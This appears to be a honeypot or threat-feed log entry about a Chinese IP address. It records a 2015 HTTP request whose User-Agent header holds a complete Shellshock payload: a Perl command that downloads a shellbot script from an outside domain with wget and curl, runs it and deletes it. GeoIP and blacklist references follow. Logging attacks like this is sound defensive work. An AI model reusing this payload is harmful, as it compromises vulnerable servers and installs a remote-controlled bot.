221.3.153.172 - Backdoor Perl Shelbot vi http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh

BEGIN OF HTTP DATA:
2015-10-23 06:47:24
Source IP: 221.3.153.172
Country: CN RiskScore: 1 Malware: []
GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt -O /tmp/vira.txt;curl -O /tmp/vira.txt http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/vira.txt;perl /tmp/vira.txt ; rm -rf vira.*");'
Host: 109.234.106.8
Connection: Close

221.3.153[.]172

Static Source: GeoIP data
• Country: China
• ASN: AS4837 CNCGROUP China169 Backbone

Dynamic Source: SANS Internet Storm Cast
• comment:IP is listed on SANS ISC
• comment:This entry alone does not indicate a threat, please check the link
• Reference: https://isc.sans.edu/api/ip/221.3.153.172

Static Source: panwdbl.appspot.com
• Comment: Listed in open blacklist
• Reference: https://panwdbl.appspot.com/lists/openbl.txt

Static Source: http://sendmespamids.blogspot.nl/ Blacklist
• Comment: Listed on Honeypot blacklist
• Reference: https://raw.githubusercontent.com/johestephan/smsids-blacklist/master/blacklist.txt

Feed search for 221.3.153[.]172

Source: Local Feed Database
• Title: 221.3.153.172 - perl trojan via shellshock - cc 69.89.2.153
• Reference: http://sendmespamids.blogspot.com/2015/10/2213153172-perl-trojan-via-shellshock.html
• In db since: 2015-10-21 13:01:19.504158